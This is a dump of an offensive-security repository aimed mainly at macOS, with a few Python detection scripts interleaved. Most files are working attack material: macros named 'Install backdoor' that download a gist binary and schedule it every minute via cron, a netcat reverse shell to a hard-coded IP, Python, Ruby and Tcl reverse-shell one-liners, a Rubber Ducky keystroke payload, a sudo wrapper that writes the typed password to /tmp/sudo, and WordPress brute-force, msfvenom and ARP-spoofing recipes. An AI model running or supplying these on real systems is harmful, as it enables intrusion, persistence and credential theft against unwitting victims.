286 | load msgrpc ServerHost=127.0.0.1 Pass=abc123 SSL=y
287 |
288 |
289 | IsDisclosed
290 |
291 | KeyCode
292 | 36
293 | MacroActionType
294 | SimulateKeystroke
295 | Modifiers
296 | 0
297 | ReleaseAll
298 |
299 | TargetApplication
300 |
301 | TargetingType
302 | Front
303 |
304 |
305 | CreationDate
306 | 604345820.90336394
307 | CustomIconData
308 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
309 | ModificationDate
310 | 604529118.67077398
311 | Name
312 | Beef integration (metasploit)
313 | Triggers
314 |
315 |
316 | MacroTriggerType
317 | StatusMenu
318 |
319 |
320 | UID
321 | 4D1540A1-836A-4B71-AA1B-9693D44FF3B0
322 |
323 |
324 | Name
325 | Metasploit
326 | Targeting
327 |
328 | Targeting
329 | Included
330 | TargetingApps
331 |
332 |
333 | BundleIdentifier
334 | com.apple.Terminal
335 | Name
336 | Terminal
337 | NewFile
338 | /System/Applications/Utilities/Terminal.app
339 |
340 |
341 | BundleIdentifier
342 | com.googlecode.iterm2
343 | Name
344 | iTerm
345 | NewFile
346 | /Applications/iTerm.app
347 |
348 |
349 |
350 | ToggleMacroUID
351 | BD3A91E8-F9C6-479E-A719-8FFE5B74C03F
352 | UID
353 | B24AC723-6106-4902-8682-F49EDDB71CDD
354 |
355 |
356 |
357 |
--------------------------------------------------------------------------------
/ressources/macros/README.md:
--------------------------------------------------------------------------------
1 | # Macros
2 |
3 | Useful macros to automate this repository's exploits (compatible with Keyboard Maestro).
--------------------------------------------------------------------------------
/ressources/macros/Remote terminal Macros.kmmacros:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 | Activate
7 | Normal
8 | CreationDate
9 | 603140665.49842894
10 | CustomIconData
11 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
12 | Macros
13 |
14 |
15 | Actions
16 |
17 |
18 | Action
19 | ByPasting
20 | MacroActionType
21 | InsertText
22 | Text
23 | curl https://gist.githubusercontent.com/NicolasGrimonpont/d038314198876bfe25d2dc34fac525b6/raw/0b269f5dfb8976d3cd633414084aa8c5b70f72e0/gistfile1.txt > /users/shared/db; chmod 777 /users/shared/db
24 |
25 |
26 | IsDisclosed
27 |
28 | KeyCode
29 | 36
30 | MacroActionType
31 | SimulateKeystroke
32 | Modifiers
33 | 0
34 | ReleaseAll
35 |
36 | TargetApplication
37 |
38 | TargetingType
39 | Front
40 |
41 |
42 | MacroActionType
43 | Pause
44 | Time
45 | 0.5
46 | TimeOutAbortsMacro
47 |
48 |
49 |
50 | Action
51 | ByPasting
52 | MacroActionType
53 | InsertText
54 | Text
55 | echo "* * * * * /users/shared/db" > /tmp/cron; crontab /tmp/cron; rm /tmp/cron
56 |
57 |
58 | IsDisclosed
59 |
60 | KeyCode
61 | 36
62 | MacroActionType
63 | SimulateKeystroke
64 | Modifiers
65 | 0
66 | ReleaseAll
67 |
68 | TargetApplication
69 |
70 | TargetingType
71 | Front
72 |
73 |
74 | CreationDate
75 | 603158737.91990697
76 | CustomIconData
77 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
78 | ModificationDate
79 | 610596097.01093602
80 | Name
81 | Install backdoor (user)
82 | Triggers
83 |
84 |
85 | MacroTriggerType
86 | StatusMenu
87 |
88 |
89 | UID
90 | 827BB293-7DE1-4CA4-9977-661C1B3353BF
91 |
92 |
93 | Name
94 | Remote terminal
95 | Targeting
96 |
97 | Targeting
98 | Included
99 | TargetingApps
100 |
101 |
102 | BundleIdentifier
103 | com.apple.Terminal
104 | Name
105 | Terminal
106 | NewFile
107 | /System/Applications/Utilities/Terminal.app
108 |
109 |
110 | BundleIdentifier
111 | com.googlecode.iterm2
112 | Name
113 | iTerm
114 | NewFile
115 | /Applications/iTerm.app
116 |
117 |
118 |
119 | ToggleMacroUID
120 | 570F5871-E330-417C-9E7A-0D67E902C1C8
121 | UID
122 | 482E9655-1457-43EC-85DD-C6B142E11DBA
123 |
124 |
125 | Activate
126 | Normal
127 | CreationDate
128 | 603140665.49842894
129 | CustomIconData
130 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
131 | Macros
132 |
133 |
134 | Actions
135 |
136 |
137 | Action
138 | ByPasting
139 | MacroActionType
140 | InsertText
141 | Text
142 | curl https://gist.githubusercontent.com/NicolasGrimonpont/d038314198876bfe25d2dc34fac525b6/raw/0b269f5dfb8976d3cd633414084aa8c5b70f72e0/gistfile1.txt > /etc/db && chmod 777 /etc/db
143 |
144 |
145 | IsDisclosed
146 |
147 | KeyCode
148 | 36
149 | MacroActionType
150 | SimulateKeystroke
151 | Modifiers
152 | 0
153 | ReleaseAll
154 |
155 | TargetApplication
156 |
157 | TargetingType
158 | Front
159 |
160 |
161 | MacroActionType
162 | Pause
163 | Time
164 | 0.5
165 | TimeOutAbortsMacro
166 |
167 |
168 |
169 | Action
170 | ByPasting
171 | MacroActionType
172 | InsertText
173 | Text
174 | echo "* * * * * /etc/db" > /tmp/cron && crontab /tmp/cron && rm /tmp/cron
175 |
176 |
177 | IsDisclosed
178 |
179 | KeyCode
180 | 36
181 | MacroActionType
182 | SimulateKeystroke
183 | Modifiers
184 | 0
185 | ReleaseAll
186 |
187 | TargetApplication
188 |
189 | TargetingType
190 | Front
191 |
192 |
193 | CreationDate
194 | 603158737.91990697
195 | CustomIconData
196 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
197 | ModificationDate
198 | 610596069.15278399
199 | Name
200 | Install backdoor (root)
201 | Triggers
202 |
203 |
204 | MacroTriggerType
205 | StatusMenu
206 |
207 |
208 | UID
209 | E7E0A8A2-3494-4A31-BDCC-AED8AFFAA590
210 |
211 |
212 | Name
213 | Remote terminal
214 | Targeting
215 |
216 | Targeting
217 | Included
218 | TargetingApps
219 |
220 |
221 | BundleIdentifier
222 | com.apple.Terminal
223 | Name
224 | Terminal
225 | NewFile
226 | /System/Applications/Utilities/Terminal.app
227 |
228 |
229 | BundleIdentifier
230 | com.googlecode.iterm2
231 | Name
232 | iTerm
233 | NewFile
234 | /Applications/iTerm.app
235 |
236 |
237 |
238 | ToggleMacroUID
239 | 570F5871-E330-417C-9E7A-0D67E902C1C8
240 | UID
241 | 482E9655-1457-43EC-85DD-C6B142E11DBA
242 |
243 |
244 |
245 |
--------------------------------------------------------------------------------
/system/exploitation/backdoor.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # Only start a new connection if no process mentioning port 1234 is running
4 | # (the [1] bracket keeps this grep itself out of the ps output).
5 | n=$(ps aux | grep -o '[1]234')
6 |
7 | if [[ $n = "" ]]; then
8 |     mkfifo /tmp/f
9 |     nc 51.210.47.127 1234 0</tmp/f | /bin/bash -i >/tmp/f 2>&1
10 |     rm /tmp/f
11 | fi
--------------------------------------------------------------------------------
/system/exploitation/host_DNS_enum.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | # Quick script to get the IP addresses of a predefined domain list text file.
3 |
4 | # Create a file called domains.txt (one domain per line) and run the following one-liner.
5 | for url in $(cat domains.txt); do host "$url"; done | grep "has address" | cut -d " " -f 4 | sort -u
6 |
--------------------------------------------------------------------------------
/system/exploitation/payloads/bash.md:
--------------------------------------------------------------------------------
1 | Create a backdoor on macOS with a Bash payload:
2 |
3 | Start macOS in Single-User Mode (no password required):
4 |
5 | CMD + S
6 |
7 | Check the disk:
8 |
9 | /sbin/fsck -fy
10 |
11 | Mount the hard drive read-write:
12 |
13 | /sbin/mount -uw /
14 |
15 | Create the Netcat Listener:
16 |
17 | nano /etc/payload
18 |
19 | Payload script (change the IP if needed):
20 |
21 | #!/bin/bash
22 | n=$(ps aux | grep -o '[1]234')
23 |
24 | if [[ $n = "" ]]; then
25 |     mkfifo f
26 |     nc -l 0.0.0.0 1234 < f | /bin/bash -i > f 2>&1
27 | fi
28 |
29 | The Netcat listener will open port 1234 on the macOS device. The first line (n=$(ps aux | grep -o '[1]234')) creates a variable n holding any running process whose command line contains 1234; the [1] bracket keeps the grep command itself out of the ps output. This is how the script checks whether the listener is already running, using ps, a tool for viewing running processes.
30 |
31 | The following line (if [[ $n = "" ]]; then) starts an if statement: if the variable n is empty (no listener on port 1234 was found), mkfifo, a tool used to create a "named pipe", creates a pipe called f. The filename is arbitrary; "f" is used for simplicity.
32 |
33 | After mkfifo comes the Netcat command (nc -l 0.0.0.0 1234 < f | /bin/bash -i > f 2>&1), which opens port 1234 on every available IPv4 interface (0.0.0.0) and uses the f pipe to pass terminal commands to and from the backdoored device.
34 |
35 |
36 | Use Cron to Execute the Script:
37 |
38 | env EDITOR=nano crontab -e
39 | * * * * * /etc/payload (add this line so cron runs the payload every minute)
40 |
41 | crontab -l > mycron
42 | echo "* * * * * /etc/payload" >> mycron
43 | crontab mycron
44 | rm mycron
45 |
46 | Set the file permissions (make the payload executable):
47 |
48 | chmod 777 /etc/payload
49 |
50 | Shut down the Mac:
51 |
52 | shutdown -h now
53 |
54 | ---------------------------------------------------------------------
55 |
56 | Connect to the Backdoored Mac:
57 |
58 | nmap -p1234,65534 -O 192.168.0.1/24 (find the IP of the macOS host)
59 |
60 | nc 192.168.0.65 1234 (on Kali)
61 |
62 | Fix the Misconfigured Source File:
63 |
64 | After establishing a connection to the Netcat listener, the shell will likely be primitive with no knowledge of where programs are located on the OS. For example, using ifconfig to view interfaces fails with "ifconfig: command not found."
65 |
66 | To fix this, use the below source command:
67 |
68 | source /etc/profile
69 |
70 | Post exploitation:
71 |
72 | system_profiler
73 | uname
74 | etc...
75 |
76 | A server (e.g. a VPS) can be used to perform this attack. In that case we don't need to be on the same network, and the server's IP is set directly in the bash script, since it is known and never changes.
77 |
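The cron persistence above is easy to spot from the defender's side. The script below is an added example (not part of this repository): it parses `crontab -l` output and flags every-minute entries whose program sits in an unusual, world-writable location. The crontab text and file modes are constructed, and `mode_func` is a hypothetical hook so the check runs offline.

```python
"""Added example, not from the original repository: find crontab entries that
look like the every-minute backdoor persistence described above."""
import os
import re
import stat
from dataclasses import dataclass, field

# A cron entry is five schedule fields followed by the command.
CRON_LINE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(.+)$")

# Places where a legitimate scheduled script is rarely kept on macOS; the page's
# own persistence commands use /etc/payload and /users/shared/db.
SUSPECT_DIRS = ("/tmp", "/private/tmp", "/var/tmp", "/etc",
                "/users/shared", "/Users/Shared")


@dataclass
class Finding:
    entry: str
    reasons: list = field(default_factory=list)


def _real_mode(path):
    """Default mode lookup: st_mode of the file, or None if it does not exist."""
    try:
        return os.stat(path).st_mode
    except OSError:
        return None


def analyse_crontab(text, mode_func=_real_mode):
    """Return one Finding per suspicious entry in `text` (output of crontab -l).

    mode_func(path) -> st_mode or None is a hypothetical hook so that file
    metadata can be supplied without touching the real file system.
    """
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank line, comment, or VAR=value assignment
        m = CRON_LINE.match(line)
        if not m:
            continue
        schedule, command = m.groups()[:5], m.group(6)
        reasons = []
        if all(f == "*" for f in schedule):
            reasons.append("runs every minute")
        program = command.split()[0]
        if any(program.startswith(d + "/") for d in SUSPECT_DIRS):
            reasons.append(f"program lives in an unusual location: {program}")
        mode = mode_func(program)
        if mode is not None and mode & stat.S_IWOTH:
            reasons.append("program is world-writable (the chmod 777 pattern)")
        if reasons:
            findings.append(Finding(line, reasons))
    return findings


# Constructed sample data modelled on the commands in this page.
SAMPLE_CRONTAB = """\
PATH=/usr/bin:/bin
# nightly backup, legitimate
0 3 * * 0 /usr/local/bin/backup.sh
* * * * * /etc/payload
* * * * * /users/shared/db
"""
SAMPLE_MODES = {
    "/usr/local/bin/backup.sh": 0o100755,
    "/etc/payload": 0o100777,
    "/users/shared/db": 0o100777,
}


def demo():
    """Run the analysis on the constructed sample."""
    return analyse_crontab(SAMPLE_CRONTAB, SAMPLE_MODES.get)


if __name__ == "__main__":
    for finding in demo():
        print(finding.entry)
        for reason in finding.reasons:
            print("   -", reason)
```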
--------------------------------------------------------------------------------
/system/exploitation/payloads/python.md:
--------------------------------------------------------------------------------
1 | Netcat & Payload:
2 |
3 | Option 1:
4 |
5 | Create an undetectable payload in Python and use it to get a shell on any macOS system:
6 |
7 | nc -l -p 8080 (listening on Kali)
8 |
9 | Create a python payload:
10 |
11 | nano payload.py (and paste the script, changing the IP)
12 |
13 | import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("1.2.3.4",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);
14 |
15 | Then you just have to execute that script on the macOS computer.
16 |
17 | Option 2:
18 |
19 | Another option is to host the script online with a pastebin web service:
20 |
21 | https://pastebin.com
22 |
23 | And execute this command on the macOS computer:
24 |
25 | curl https://pastebin.com/raw/TAM2q3rW | python &
26 |
27 | Option 3:
28 |
29 | Execute a file served from a computer on the same network.
30 |
31 | sudo curl http://192.168.0.110/reverse_tcp.py | sudo python &
32 |
33 | Or copy all the necessary files onto the computer you attack and execute the script there.
34 |
35 | curl http://192.168.0.110/reverse_tcp.py > /tmp/reverse_tcp.py
36 | sudo python /tmp/reverse_tcp.py
37 |
38 | Option 4:
39 |
40 | Create a macOS application that runs the script in the background with Platypus:
41 |
42 | https://sveinbjorn.org/platypus
43 |
--------------------------------------------------------------------------------
/system/exploitation/payloads/ruby.md:
--------------------------------------------------------------------------------
1 | Same attack as with the other scripting languages; the one-liner can be put in a file or on a pastebin web service.
2 |
3 | nc -l -p 8080 (on Kali)
4 |
5 | ruby -rsocket -e "c=TCPSocket.new('1.2.3.4','9999');while(cmd=c.gets);IO.popen(cmd,'r'){|io|c.print io.read}end"
6 |
7 | This one-liner above will create a TCP socket (TCPSocket.new) and a while loop (while ... end) that says "while there's data coming in, assign it to cmd, run the input as a shell command, and print it back in our terminal (IO.popen(cmd,'r'){|io|c.print io.read})." Essentially, we're telling Ruby to take the command we submit, execute it, interpret the output, and send it back to us ... over and over again until we break the connection to the macOS device.
8 |
9 | Remember to change the IP address (1.2.3.4) and port number (9999) to match the Netcat listener created in the previous step. This can be a local network IP address or the IP address of your VPS. On the attacker's system, the Netcat terminal will show that a new connection was established.
10 |
--------------------------------------------------------------------------------
/system/exploitation/payloads/tclsh.md:
--------------------------------------------------------------------------------
1 | As mentioned, Netcat backdoors can be established with minimal characters, making them the ideal method for quickly getting remote access to a Mac desktop or laptop. However, if the MacBook or other macOS device suddenly goes to sleep, locks, or loses its Wi-Fi connection while the attacker is issuing remote commands, the Netcat process may freeze and fail to terminate. This ultimately leaves the attacker with no new way to remotely access the device.
2 |
3 | Fortunately, Tclsh handles sudden disconnections gracefully and is already present in all macOS devices. If you're a macOS user, you can test this by opening a Terminal and typing tclsh. You'll find that ls and ifconfig function as expected.
4 |
5 | Start a Netcat Listener:
6 |
7 | nc -l -p 9999 (on mac)
8 |
9 | Execute the Tclsh Command:
10 |
11 | echo 'set s [socket 1.2.3.4 9999];while 42 { puts -nonewline $s "hacker> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh &
12 |
13 | Rubber Ducky Payloads (optional):
14 |
15 | Let's focus on using a USB Rubber Ducky to execute the command where a few seconds of physical access is possible. Below is an example payload.
16 |
17 | Rubber Ducky Script:
18 |
19 | DELAY 1500
20 | GUI SPACE
21 | DELAY 350
22 | STRING terminal
23 | DELAY 100
24 | ENTER
25 | DELAY 1000
26 | STRING echo 'set s [socket 1.2.3.4 9999];while 42 { puts -nonewline $s "hacker> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh &
27 | ENTER
28 | GUI q
--------------------------------------------------------------------------------
/system/exploitation/reverse_shells.md:
--------------------------------------------------------------------------------
1 | # Reverse Shell Commands
2 | The following are some useful commands to start listeners and reverse shells on Linux and Windows-based systems.
3 |
4 | ## Netcat Linux Reverse Shell
5 | `nc 10.10.10.10 888 -e /bin/sh`
6 | * 10.10.10.10 is the IP address of the machine you want the victim to connect to.
7 | * 888 is the port number (change this to whatever port you would like to use, just make sure that no firewall is blocking it).
8 |
9 | ## Netcat Windows Reverse Shell
10 | `nc 10.10.10.10 888 -e cmd.exe`
11 | * 10.10.10.10 is the IP address of the machine you want the victim to connect to.
12 | * 888 is the port number (change this to whatever port you would like to use, just make sure that no firewall is blocking it).
13 |
14 | ## Using Bash
15 | `bash -i >& /dev/tcp/10.10.10.10/888 0>&1`
16 |
17 | ## Using Python
18 | `python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("10.10.10.10",888)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'`
19 |
20 | ## Using Ruby
21 | `ruby -rsocket -e 'f=TCPSocket.open("10.10.10.10",888).to_i; exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'`
22 |
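As an added detection example (not from the original page), the classifier below runs over `ps aux`-style output and tags command lines that match the listener and reverse-shell one-liners collected in this repository: netcat -e, bash /dev/tcp, Python socket+dup2, Ruby TCPSocket and the tclsh socket shell from payloads/tclsh.md. The process lines are constructed and abbreviated, and the rule names and regexes are my own.

```python
"""Added example, not from the original page: flag process command lines that
match the reverse/bind-shell one-liners collected in this repository."""
import re

# (technique name, regex over the command line). Deliberately loose about
# hosts and ports; tune the rules for your environment.
RULES = [
    ("netcat -e shell",
     re.compile(r"\bnc(at)?\b.*\s-e\s+\S*(sh|cmd\.exe)\b")),
    ("netcat listener / fifo shell",
     re.compile(r"\bnc(at)?\b.*(\s-l\b|mkfifo|/tmp/f\b)")),
    ("bash /dev/tcp reverse shell",
     re.compile(r"/dev/tcp/\d{1,3}(\.\d{1,3}){3}/\d+")),
    ("python socket + dup2 shell",
     re.compile(r"python.*socket\.socket.*os\.dup2")),
    ("ruby TCPSocket shell",
     re.compile(r"ruby.*TCPSocket\.(new|open)")),
    ("tclsh socket shell",
     re.compile(r"\[socket\s+\S+\s+\d+\].*\bexec\b")),
]


def classify(cmdline):
    """Names of every rule that matches one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan_ps_output(text):
    """Parse `ps aux` output (the command is the 11th column) and return hits."""
    hits = []
    for line in text.splitlines():
        parts = line.split(None, 10)
        if len(parts) < 11 or parts[0] == "USER":
            continue  # too short, or the header line
        user, pid, cmdline = parts[0], parts[1], parts[10]
        techniques = classify(cmdline)
        if techniques:
            hits.append({"pid": int(pid), "user": user,
                         "techniques": techniques, "cmd": cmdline})
    return hits


# Constructed, abbreviated `ps aux` lines; "..." marks elided parts of the
# one-liners, which appear in full earlier on this page.
SAMPLE_PS = """\
USER    PID %CPU %MEM    VSZ   RSS TT   STAT STARTED    TIME COMMAND
root      1  0.0  0.1  12345  6789 ??   Ss   10:00AM 0:01.00 /sbin/launchd
alice   412  0.0  0.0  11111  2222 s001 S+   10:02AM 0:00.10 nc 10.10.10.10 888 -e /bin/sh
alice   418  0.1  0.2  33333  4444 s001 S    10:03AM 0:00.20 bash -i >& /dev/tcp/10.10.10.10/888 0>&1
bob     501  0.0  0.3  44444  5555 ??   S    10:04AM 0:00.30 python -c import socket,subprocess,os;s=socket.socket(...);os.dup2(s.fileno(),0)
bob     502  0.0  0.0  22222  3333 ??   S    10:04AM 0:00.05 /usr/bin/python3 /usr/local/bin/inventory.py --socket /tmp/inv.sock
root    777  0.0  0.0  10000  1000 ??   S    10:05AM 0:00.00 nc -l 0.0.0.0 1234
carol   803  0.0  0.0  10000  1000 s002 S    10:06AM 0:00.00 ruby -rsocket -e f=TCPSocket.open("10.10.10.10",888).to_i;exec ...
carol   811  0.0  0.0  10000  1000 s002 S    10:07AM 0:00.00 sh -c echo 'set s [socket 10.10.10.10 9999];while 42 { ... set e "exec $c" ... }' | tclsh
"""


def demo():
    """Scan the constructed sample."""
    return scan_ps_output(SAMPLE_PS)


if __name__ == "__main__":
    for hit in demo():
        print(hit["pid"], hit["user"], hit["techniques"])
```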
--------------------------------------------------------------------------------
/system/exploitation/reverse_tcp.py:
--------------------------------------------------------------------------------
1 | import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.110",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);
2 |
--------------------------------------------------------------------------------
/system/exploitation/sudo.sh:
--------------------------------------------------------------------------------
1 | function sudo (){
2 | rs="$(which sudo)";
3 | read -s -p "Password: " input;
4 | printf "\n";
5 | printf '%s\n' "$USER : $input" > /tmp/sudo;
6 | $rs -S -u root bash -c "exit" <<< "$input" > /dev/null 2>&1;
7 | $rs "${@:1}"
8 | }
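The wrapper above only works because a shell function named sudo wins over the real binary. The scanner below is an added example (not part of this repository): it reads rc-file text, finds functions or aliases that shadow sudo, and flags the harvesting pattern (a silent read, the captured variable written to a file and replayed to sudo -S). The rc-file contents are constructed; the .bashrc sample embeds the sudo.sh function from this repository.

```python
"""Added example, not from the original repository: scan shell rc files for a
function or alias that shadows sudo and captures the typed password."""
import re

SHADOW_PATTERNS = [
    ("function definition", re.compile(r"^\s*(function\s+sudo\b|sudo\s*\(\s*\))")),
    ("alias", re.compile(r"^\s*alias\s+sudo=")),
]
SILENT_READ = re.compile(r"\bread\b.*\s-s\b")


def _silent_read_var(body_lines):
    """Name of the variable filled by `read -s ...`, or None."""
    for line in body_lines:
        if SILENT_READ.search(line):
            return line.rstrip("; ").split()[-1]
    return None


def find_sudo_shadows(rc_text):
    """Return a finding for every sudo alias/function, with harvesting hints."""
    findings = []
    lines = rc_text.splitlines()
    i = 0
    while i < len(lines):
        kind = next((k for k, rx in SHADOW_PATTERNS if rx.search(lines[i])), None)
        if kind is None:
            i += 1
            continue
        start, body = i + 1, [lines[i]]
        if kind == "function definition":
            # Collect the body by brace depth (good enough for rc-file functions).
            depth = lines[i].count("{") - lines[i].count("}")
            while depth > 0 and i + 1 < len(lines):
                i += 1
                body.append(lines[i])
                depth += lines[i].count("{") - lines[i].count("}")
        text = "\n".join(body)
        hints = []
        var = _silent_read_var(body)
        if var:
            ref = r"\$\{?" + re.escape(var) + r"\}?"
            hints.append(f"prompts silently into ${var}")
            if re.search(ref + r".*>\s*\S", text):
                hints.append(f"${var} is redirected to a file")
            if re.search(r"-S\b.*<<<\s*\"?" + ref, text):
                hints.append(f"${var} is replayed to sudo -S to validate it")
        findings.append({"line": start, "kind": kind, "hints": hints})
        i += 1
    return findings


# Constructed rc files. SAMPLE_BASHRC embeds the harvesting wrapper from this
# repository's sudo.sh; SAMPLE_ZSHRC holds two harmless definitions.
SAMPLE_BASHRC = r"""export PATH=$HOME/bin:$PATH
alias ll='ls -l'
function sudo (){
rs="$(which sudo)";
read -s -p "Password: " input;
printf "\n";
printf '%s\n' "$USER : $input" > /tmp/sudo;
$rs -S -u root bash -c "exit" <<< "$input" > /dev/null 2>&1;
$rs "${@:1}"
}
"""
SAMPLE_ZSHRC = """\
sudo() { command sudo -E "$@"; }
alias sudo='sudo '
"""


def demo():
    """Scan both constructed rc files."""
    samples = {".bashrc": SAMPLE_BASHRC, ".zshrc": SAMPLE_ZSHRC}
    return {name: find_sudo_shadows(text) for name, text in samples.items()}


if __name__ == "__main__":
    for name, findings in demo().items():
        for f in findings:
            print(f"{name}:{f['line']} {f['kind']} {f['hints']}")
```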
--------------------------------------------------------------------------------
/tools/brute_force/wpscan.md:
--------------------------------------------------------------------------------
1 | Brute Force The WordPress Admin Account Password:
2 |
3 | wpscan --url targetwordpressurl.com --wordlist /usr/share/wordlists/rockyou.txt --username admin --threads 2
4 |
5 | --wordlist: replace the wordlist and its location with your choice
6 | --username: your target's username
7 | --threads: the number of threads you would like to use
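On the defending side, a brute-force run like the one above shows up in the web server's access log as a burst of POSTs to wp-login.php (or xmlrpc.php) from one client. The detector below is an added example (not from the original page) that reads common-log-format lines and alerts on a sliding window; the log lines are constructed, and the threshold and window are arbitrary defaults.

```python
"""Added example, not from the original page: detect a wpscan-style password
attack on wp-login.php / xmlrpc.php from web-server access logs."""
import re
from collections import defaultdict, deque
from datetime import datetime

# Common/combined log format: client, identd, user, [timestamp], "request", status.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')
LOGIN_PATHS = {"/wp-login.php", "/xmlrpc.php"}


def detect_login_bruteforce(log_text, threshold=5, window_seconds=60):
    """Return {ip: {"peak", "first", "last"}} for clients that POST to a login
    endpoint at least `threshold` times within any `window_seconds` span."""
    recent = defaultdict(deque)  # ip -> POST timestamps inside the window
    alerts = {}
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        ip, ts, method, path, _status = m.groups()
        # WordPress answers a failed login with 200 and a successful one with
        # 302, so the status column is a useful refinement, not needed here.
        if method != "POST" or path.split("?", 1)[0] not in LOGIN_PATHS:
            continue
        t = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        q = recent[ip]
        q.append(t)
        while (t - q[0]).total_seconds() > window_seconds:
            q.popleft()
        if len(q) >= threshold:
            a = alerts.setdefault(ip, {"peak": 0, "first": q[0], "last": t})
            a["peak"] = max(a["peak"], len(q))
            a["last"] = t
    return alerts


# Constructed access-log sample: one normal login, one wpscan-style burst and
# one slow, legitimate-looking client.
SAMPLE_LOG = """\
198.51.100.2 - - [10/Oct/2020:13:55:10 +0000] "GET /wp-login.php HTTP/1.1" 200 4523 "-" "Mozilla/5.0"
198.51.100.2 - - [10/Oct/2020:13:55:20 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2020:13:55:36 +0000] "GET /wp-login.php HTTP/1.1" 200 4523 "-" "WPScan v3.8"
203.0.113.7 - - [10/Oct/2020:13:55:37 +0000] "POST /wp-login.php HTTP/1.1" 200 4701 "-" "WPScan v3.8"
203.0.113.7 - - [10/Oct/2020:13:55:38 +0000] "POST /wp-login.php HTTP/1.1" 200 4701 "-" "WPScan v3.8"
203.0.113.7 - - [10/Oct/2020:13:55:40 +0000] "POST /wp-login.php HTTP/1.1" 200 4701 "-" "WPScan v3.8"
203.0.113.7 - - [10/Oct/2020:13:55:41 +0000] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "WPScan v3.8"
203.0.113.7 - - [10/Oct/2020:13:55:43 +0000] "POST /wp-login.php HTTP/1.1" 200 4701 "-" "WPScan v3.8"
203.0.113.7 - - [10/Oct/2020:13:55:45 +0000] "POST /wp-login.php?redirect_to=%2Fwp-admin%2F HTTP/1.1" 200 4701 "-" "WPScan v3.8"
192.0.2.9 - - [10/Oct/2020:14:10:00 +0000] "POST /wp-login.php HTTP/1.1" 200 4701 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Oct/2020:14:20:00 +0000] "POST /wp-login.php HTTP/1.1" 200 4701 "-" "Mozilla/5.0"
"""


def demo():
    """Run the detector over the constructed sample."""
    return detect_login_bruteforce(SAMPLE_LOG)


if __name__ == "__main__":
    for ip, info in demo().items():
        print(f"{ip}: up to {info['peak']} login POSTs per minute "
              f"between {info['first']:%H:%M:%S} and {info['last']:%H:%M:%S}")
```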
--------------------------------------------------------------------------------
/tools/john.md:
--------------------------------------------------------------------------------
1 | To show the types of passwords that John can crack, along with the cracking speed (in cracks/second)
2 |
3 | john --test
4 |
5 | To use your own word list (the Rockyou list is suggested)
6 |
7 | john --wordlist=[filename] [passwordfile]
8 |
9 | To show your results after running john (shows ~/.john/john.pot)
10 |
11 | john --show
12 |
13 | To restore an interrupted john session
14 |
15 | john --restore
--------------------------------------------------------------------------------
/tools/metasploit.md:
--------------------------------------------------------------------------------
1 | cd /usr/share/metasploit-framework
2 |
3 | Maintain Database:
4 |
5 | - msfdb
6 | - msfdb init
7 | - msfdb delete
8 | - msfdb reinit
9 |
10 | Create workspace:
11 |
12 | - workspace -h
13 | - workspace -a project (add & select)
14 | - workspace -d project (delete & select default)
15 | - workspace project (change)
16 |
17 | - creds (check credentials)
18 |
19 | Create Payloads:
20 |
21 | - msfpc Python 192.168.0.137 8080
22 |
23 | msfpc uses msfvenom to create the payload and also writes a resource file so you can start the matching handler in msfconsole easily.
24 |
25 | - msfvenom -l
26 | - msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.0.116 lport=8888 > reverse_tcp.py
27 |
28 | - msfvenom + template
29 |
30 | - shellter + template
31 |
32 | - veil
33 |
34 | Use Exploits:
35 |
36 | - use exploit/multi/handler
37 | - options
38 |
39 | - set payload python/meterpreter/reverse_tcp
40 | - set lhost 192.168.0.116
41 | - set lport 8888
42 |
43 | - run
44 |
45 | Install on Mac OS:
46 |
47 | - here is the download for Mac
48 |
49 | cd /opt/metasploit-framework/bin/
--------------------------------------------------------------------------------
/tools/mitm/ARP Spoofing & Bettercap.md:
--------------------------------------------------------------------------------
1 | Perform ARP spoofing attack:
2 |
3 | sudo bash -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'
4 |
5 | sudo bettercap
6 | set arp.spoof.targets 10.0.2.4
7 | set arp.spoof.fullduplex true
8 | arp.spoof on
9 |
10 | Create a proxy script (JavaScript, loaded by bettercap's http.proxy module):
11 |
12 | nano myscript.py
13 |
14 | function onResponse(req, res) {
15 |     if( res.ContentType.indexOf('text/html') == 0 ){
16 |         var body = res.ReadBody();
17 |         if( body.indexOf('') != -1 ) {
18 |             res.Body = body.replace(
19 |                 '',
20 |                 ''
21 |             );
22 |         }
23 |     }
24 | }
25 |
